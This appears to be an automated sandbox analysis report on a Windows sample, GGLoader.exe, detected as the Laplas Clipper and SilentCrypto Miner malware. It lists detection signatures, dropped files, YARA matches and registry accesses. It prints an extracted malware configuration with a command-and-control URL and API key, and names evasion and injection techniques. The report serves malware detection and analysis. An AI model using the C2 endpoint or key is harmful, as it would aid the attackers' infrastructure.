Windows Analysis Report
GGLoader.exe

Overview

General Information

Sample name: GGLoader.exe
Analysis ID: 1526110
MD5: 982e4ae4559538cfb529dfaff0507880
SHA1: a3b0e3989d6e40792134286e40448004ebeda077
SHA256: 95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
Infos:

Detection

Laplas Clipper, SilentCrypto Miner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Laplas Clipper
Yara detected Powershell download and execute
Yara detected SilentCrypto Miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary or sample is protected by dotNetProtector
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops large PE files
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found stalling execution ending in API Sleep call
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: GGLoader.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files\Google\Chrome\updater.exe Avira: detection malicious, Label: HEUR/AGEN.1325648
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Avira: detection malicious, Label: HEUR/AGEN.1317771
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Avira: detection malicious, Label: HEUR/AGEN.1319806
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Avira: detection malicious, Label: HEUR/AGEN.1325648
Found malware configuration
Source: svcupdater.exe.7904.35.memstrmin Malware Configuration Extractor: Laplas Clipper {"C2 url": "http://45.159.189.105/bot/", "API key": "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e"}
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Google\Chrome\updater.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: GGLoader.exe ReversingLabs: Detection: 76%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Program Files\Google\Chrome\updater.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LicenseGet.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: GGLoader.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\dialer.exe Code function: 37_2_00007FF790DC1000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 37_2_00007FF790DC1000

Bitcoin Miner
barindex
Yara detected SilentCrypto Miner
Source: Yara match File source: 37.2.dialer.exe.7ff790dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c51e800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba5900.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.dialer.exe.7ff790dc60b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c52eb9aeb0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.powershell.exe.42cce80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c51e800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba5900.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c52eb9aeb0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.dialer.exe.7ff790dc60b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.powershell.exe.42cce80.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba91b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba91b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3b90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2236987878.000001C51E800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LicSend.exe PID: 7948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR
Uses 32bit PE files
Source: GGLoader.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: GGLoader.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
